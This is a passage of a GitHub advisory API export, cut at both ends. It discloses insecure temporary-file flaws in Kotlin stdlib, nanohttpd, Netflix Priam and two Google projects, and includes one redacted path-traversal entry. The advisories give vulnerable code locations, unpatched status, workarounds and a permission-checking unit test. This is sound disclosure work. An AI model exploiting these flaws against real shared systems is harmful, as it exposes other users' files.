"https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": 
"https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-7fjx-657r-9r5h", "cve_id": "CVE-2021-22571", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-7fjx-657r-9r5h", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-7fjx-657r-9r5h", "summary": "Insecure Temporary File in google / sa360-webquery-bigquery", "description": "### CVE Status\r\n\r\nCVE is pending via the CVE Appeals process with MITRE\r\n\r\n### Impact\r\n\r\n`TransferRunner` may disclose information to other users from WebQuery CSV report.\r\n\r\n### Patches\r\n\r\nVersion `v1.0.3` and higher is patched.\r\n\r\n### Prerequisites\r\n\r\nThis vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.\r\n\r\n### Workarounds\r\n\r\nIf you are unable to update: setting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems.\r\n\r\n### References\r\n\r\n - https://github.com/google/sa360-webquery-bigquery/issues/14\r\n\r\nFix:\r\n - https://github.com/google/sa360-webquery-bigquery/commit/4926b5bf0e4be88f7a09badd145c50fa8a95e1cc#diff-4169b705389b36efbde7d57ec27a1ad2aa21c4385d2e535ee8354f79f03ae756L56\r\n", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": 
"https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-7fjx-657r-9r5h", "type": "GHSA" }, { "value": "CVE-2021-22571", "type": "CVE" } ], "state": "published", "created_at": "2022-02-04T21:54:20Z", "updated_at": 
"2022-03-30T13:03:08Z", "published_at": "2022-03-09T16:50:35Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "application", "name": "google / sa360-webquery-bigquery" }, "vulnerable_version_range": "<= v1.0.2", "patched_versions": "v1.0.3", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "score": 5.5 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" } ], "cwe_ids": [ "CWE-377" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-22c6-wcjm-qfjg", "cve_id": "CVE-2021-22572", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-22c6-wcjm-qfjg", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-22c6-wcjm-qfjg", "summary": "Insecure Temporary File in google / data-transfer-project", 
"description": "### Impact\r\n\r\nInformation downloaded with the `google/data-transfer-project` may expose  downloaded information to other local users.\r\n\r\n### Prerequisites\r\n\r\nThis vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.\r\n\r\n### Patches\r\n\r\nUpdates to version 0.3.57 or higher.\r\n\r\n### Additional Information\r\n - https://github.com/google/data-transfer-project/issues/968\r\n\r\n### Workarounds\r\n\r\nSetting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems.\r\n", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": 
"https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-22c6-wcjm-qfjg", "type": "GHSA" }, { "value": "CVE-2021-22572", "type": "CVE" } ], "state": "published", "created_at": "2022-02-04T21:43:29Z", "updated_at": "2022-03-30T13:02:44Z", "published_at": "2022-03-09T16:39:35Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "none", "name": "google / data-transfer-project" }, "vulnerable_version_range": "< 0.3.57", "patched_versions": "0.3.57", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "score": 5.0 }, "cwes": [ { "cwe_id": "CWE-377", "name": "Insecure Temporary File" } ], "cwe_ids": [ "CWE-377" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": 
"https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-5w9v-8x7x-rfqm", "cve_id": "CVE-2020-29582", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-5w9v-8x7x-rfqm", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-5w9v-8x7x-rfqm", "summary": "CWE-378/CWE-379: Kotlin StdLib - Creation of Temporary File/Directory With Insecure Permissions", "description": "### Impact\r\nKotlin Stdlib is vulnerable to CWE-378 - Insecure Temporary File & \tCWE-379 - Creation of Temporary File in Directory with Insecure Permissions.\r\n\r\nThese are the two vulnerable locations:\r\n\r\n- https://github.com/JetBrains/kotlin/blob/9b157fd291d581a30a3194940b0ebbb95a2fd247/libraries/stdlib/jvm/src/kotlin/io/files/Utils.kt#L14-L39\r\n - https://github.com/JetBrains/kotlin/blob/9b157fd291d581a30a3194940b0ebbb95a2fd247/libraries/stdlib/jvm/src/kotlin/io/files/Utils.kt#L41-L60\r\n\r\nHere is a simple unit test that demonstrates the vulnerability.\r\n\r\n```kotlin\r\npackage org.jlleitschuh.sandbox\r\n\r\nimport org.junit.jupiter.api.Test\r\nimport java.io.BufferedReader\r\nimport java.io.File\r\nimport java.io.IOException\r\nimport java.io.InputStreamReader\r\nimport java.nio.file.Files\r\n\r\nclass KotlinTempDirectoryPermissionCheck {\r\n    @Test\r\n    fun `kotlin check default directory permissions`() {\r\n        val dir = createTempDir()\r\n        
runLS(dir.parentFile, dir) // Prints drwxr-xr-x\r\n    }\r\n\r\n    @Test\r\n    fun `Files check default directory permissions`() {\r\n        val dir = Files.createTempDirectory(\"random-directory\")\r\n        runLS(dir.toFile().parentFile, dir.toFile()) // Prints drwx------\r\n    }\r\n\r\n    @Test\r\n    fun `kotlin check default file permissions`() {\r\n        val file = createTempFile()\r\n        runLS(file.parentFile, file) // Prints -rw-r--r--\r\n    }\r\n\r\n    @Test\r\n    fun `Files check default file permissions`() {\r\n        val file = Files.createTempFile(\"random-file\", \".txt\")\r\n        runLS(file.toFile().parentFile, file.toFile()) // Prints -rw-------\r\n    }\r\n\r\n    private fun runLS(file: File, lookingFor: File) {\r\n        val processBuilder = ProcessBuilder()\r\n        processBuilder.command(\"ls\", \"-l\", file.absolutePath)\r\n        try {\r\n            val process = processBuilder.start()\r\n            val output = StringBuilder()\r\n            val reader = BufferedReader(\r\n                InputStreamReader(process.inputStream)\r\n            )\r\n            reader.lines().forEach { line ->\r\n                if (line.contains(\"total\")) {\r\n                    output.append(line).append('\\n')\r\n                }\r\n                if (line.contains(lookingFor.name)) {\r\n                    output.append(line).append('\\n')\r\n                }\r\n            }\r\n            val exitVal = process.waitFor()\r\n            if (exitVal == 0) {\r\n                println(\"Success!\")\r\n                println(output)\r\n            } else {\r\n                //abnormal...\r\n            }\r\n        } catch (e: IOException) {\r\n            e.printStackTrace()\r\n        } catch (e: InterruptedException) {\r\n            e.printStackTrace()\r\n        }\r\n    }\r\n}\r\n```\r\n\r\nA Kotlin application using createTempDir or createTempFile and placing sensitive information within either of these locations would 
be leaking this information in a read-only way to other users also on this system.\r\n\r\n### Prerequisites\r\n\r\nThis vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.\r\n\r\n### Patches\r\n\r\nThere are no patched versions with this vulnerability fixed. All versions remain vulnerable. However, the impacted methods have been deprecated.\r\n\r\nTo fully mitigate this vulnerability, ensure your code and all dependencies don't use the `createTempFile` or `createTempFile` methods offered by the Kotlin standard library.\r\n\r\n### Workarounds\r\n\r\nSetting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems and all Kotlin versions.\r\n\r\nDepending upon the version of android you are using, this may also impact you. See the following resource: https://github.com/google/guava/issues/4011#issuecomment-772892561\r\n\r\n### References\r\n\r\nJetBrains does a really terrible job with fully disclosing the details of their own vulnerabilities unfortunately.\r\n\r\n - https://blog.jetbrains.com/blog/2021/02/03/jetbrains-security-bulletin-q4-2020/\r\n \r\n### For more information\r\n\r\nReach out to Jetbrains: security@jetbrains.com\r\n", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": 
"https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-5w9v-8x7x-rfqm", "type": "GHSA" }, { "value": "CVE-2020-29582", "type": "CVE" } ], "state": "published", "created_at": "2022-02-03T19:40:43Z", "updated_at": "2022-02-03T20:42:27Z", "published_at": "2022-02-03T19:51:08Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": " org.jetbrains.kotlin:kotlin-stdlib" }, "vulnerable_version_range": "> 0", "patched_versions": "None", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "score": 5.5 }, "cwes": [ 
{ "cwe_id": "CWE-378", "name": "Creation of Temporary File With Insecure Permissions" }, { "cwe_id": "CWE-379", "name": "Creation of Temporary File in Directory with Insecure Permissions" } ], "cwe_ids": [ "CWE-378", "CWE-379" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-2r85-x9cf-8fcg", "cve_id": "CVE-2022-21230", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-2r85-x9cf-8fcg", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-2r85-x9cf-8fcg", "summary": "Creation of Temporary File With Insecure Permissions in org.nanohttpd:nanohttpd", "description": "### Patches\r\n\r\nNo patches are available. The maintainers have been unresponsive. 
It may be appropriate to consider this project unmaintained at this point.\r\n\r\n### Impact\r\n\r\nThe `org.nanohttpd.protocols.http.tempfiles.DefaultTempFileManager` & `org.nanohttpd.protocols.http.tempfiles.DefaultTempFile` contain a local temporary file information disclosure vulnerability. On Unix like systems, the system's temporary directory is shared between all users on that system. As such, files written to that directory without setting the correct file permissions can allow other users on that system to view the contents of the files written to those temporary files.\r\n\r\n#### Vulnerability Locations\r\n\r\n - https://github.com/NanoHttpd/nanohttpd/blob/efb2ebf85a2b06f7c508aba9eaad5377e3a01e81/core/src/main/java/org/nanohttpd/protocols/http/tempfiles/DefaultTempFile.java#L58\r\n - https://github.com/NanoHttpd/nanohttpd/blob/efb2ebf85a2b06f7c508aba9eaad5377e3a01e81/core/src/main/java/org/nanohttpd/protocols/http/tempfiles/DefaultTempFileManager.java#L60\r\n\r\nWhenever an HTTP Session is parsing the body of an HTTP request, the body of the request is written to a RandomAccessFile when the body is larger than 1024 bytes. 
Unfortunately, RandomAccessFile is created using a temporary file which is created with file permissions that allow it's contents to be viewed by all users on the host machine.\r\n\r\nhttps://github.com/NanoHttpd/nanohttpd/blob/efb2ebf85a2b06f7c508aba9eaad5377e3a01e81/core/src/main/java/org/nanohttpd/protocols/http/HTTPSession.java#L611-L617\r\n\r\n### Workarounds\r\n\r\nManually specifying the `-Djava.io.tmpdir=` argument when launching Java to set set the temporary directory to a directory exclusively controlled by the current user can fix this issue.\r\n\r\n### References\r\n - https://security.snyk.io/vuln/SNYK-JAVA-ORGNANOHTTPD-2422798\r\n", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": 
"https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-2r85-x9cf-8fcg", "type": "GHSA" }, { "value": "CVE-2022-21230", "type": "CVE" } ], "state": "published", "created_at": "2022-01-28T02:33:00Z", "updated_at": "2022-04-06T18:38:01Z", "published_at": "2022-04-06T18:38:01Z", "closed_at": null, "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": "maven", "name": "org.nanohttpd:nanohttpd" }, "vulnerable_version_range": "<=2.3.1", "patched_versions": "None", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "score": 5.5 }, "cwes": [ { "cwe_id": "CWE-378", "name": "Creation of Temporary File With Insecure Permissions" } ], "cwe_ids": [ "CWE-378" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": 
"https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-6m9h-r5m3-9r7f", "cve_id": null, "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-6m9h-r5m3-9r7f", "html_url": "https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-6m9h-r5m3-9r7f", "summary": "REDACTED", "description": "REDACTED", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": null, "identifiers": [ { "value": "GHSA-6m9h-r5m3-9r7f", 
"type": "GHSA" } ], "state": "closed", "created_at": "2022-01-20T23:27:50Z", "updated_at": "2023-02-27T19:48:30Z", "published_at": null, "closed_at": "2023-02-27T19:48:30Z", "withdrawn_at": null, "submission": null, "vulnerabilities": [ { "package": { "ecosystem": " ", "name": "REDACTED" }, "vulnerable_version_range": "3.16", "patched_versions": "", "vulnerable_functions": [] } ], "cvss": { "vector_string": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "score": 6.5 }, "cwes": [ { "cwe_id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')" } ], "cwe_ids": [ "CWE-22" ], "credits": [ { "login": "JLLeitschuh", "type": "analyst" } ], "credits_detailed": [ { "user": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "type": "analyst", "state": "accepted" } ] }, { "ghsa_id": "GHSA-f4jh-ww96-9h9j", "cve_id": "CVE-2021-28100", "url": "https://api.github.com/repos/JLLeitschuh/security-research/security-advisories/GHSA-f4jh-ww96-9h9j", "html_url": 
"https://github.com/JLLeitschuh/security-research/security/advisories/GHSA-f4jh-ww96-9h9j", "summary": "Netflix/Priam: Temporary Directory Information Disclosure", "description": "### Impact\r\n\r\nWhen `File.createTempFile` creates a file, the permissions on that file are -rw-r--r--. This means that other users can read the contents of these files after they are written, although they can not modify the contents. This allows for local information disclosure if these files contain sensitive information.\r\n\r\nVulnerable locations:\r\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/backup/MetaData.java#L106-L111\r\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/identity/DoubleRing.java#L109-L118\r\n - https://github.com/Netflix/Priam/blob/362660bb7ebddb0cfa756a282d94678f65af9f06/priam/src/main/java/com/netflix/priam/restore/PostRestoreHook.java#L80-L86\r\n\r\n---\r\n\r\nThe custom CodeQL queries leveraged to find these this as well as their results can be found here:\r\n\r\nhttps://lgtm.com/query/1543383251073929777/\r\nhttps://lgtm.com/query/3142895023158674709/\r\n\r\n## Official Disclosure\r\n\r\nhttps://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2021-002.md\r\n\r\n## Fix\r\n\r\nThere are no fixed versions.", "severity": "medium", "author": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": 
"https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "publisher": { "login": "JLLeitschuh", "id": 1323708, "node_id": "MDQ6VXNlcjEzMjM3MDg=", "avatar_url": "https://avatars.githubusercontent.com/u/1323708?v=4", "gravatar_id": "", "url": "https://api.github.com/users/JLLeitschuh", "html_url": "https://github.com/JLLeitschuh", "followers_url": "https://api.github.com/users/JLLeitschuh/followers", "following_url": "https://api.github.com/users/JLLeitschuh/following{/other_user}", "gists_url": "https://api.github.com/users/JLLeitschuh/gists{/gist_id}", "starred_url": "https://api.github.com/users/JLLeitschuh/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/JLLeitschuh/subscriptions", "organizations_url": "https://api.github.com/users/JLLeitschuh/orgs", "repos_url": "https://api.github.com/users/JLLeitschuh/repos", "events_url": "https://api.github.com/users/JLLeitschuh/events{/privacy}", "received_events_url": "https://api.github.com/users/JLLeitschuh/received_events", "type": "User", "site_admin": false }, "identifiers": [ { "value": "GHSA-f4jh-ww96-9h9j", "type": "GHSA" }, { "value": "CVE-2021-28100", "type": "CVE" } ], "state": "published", "created_at": "2021-03-22T23:38:20Z", 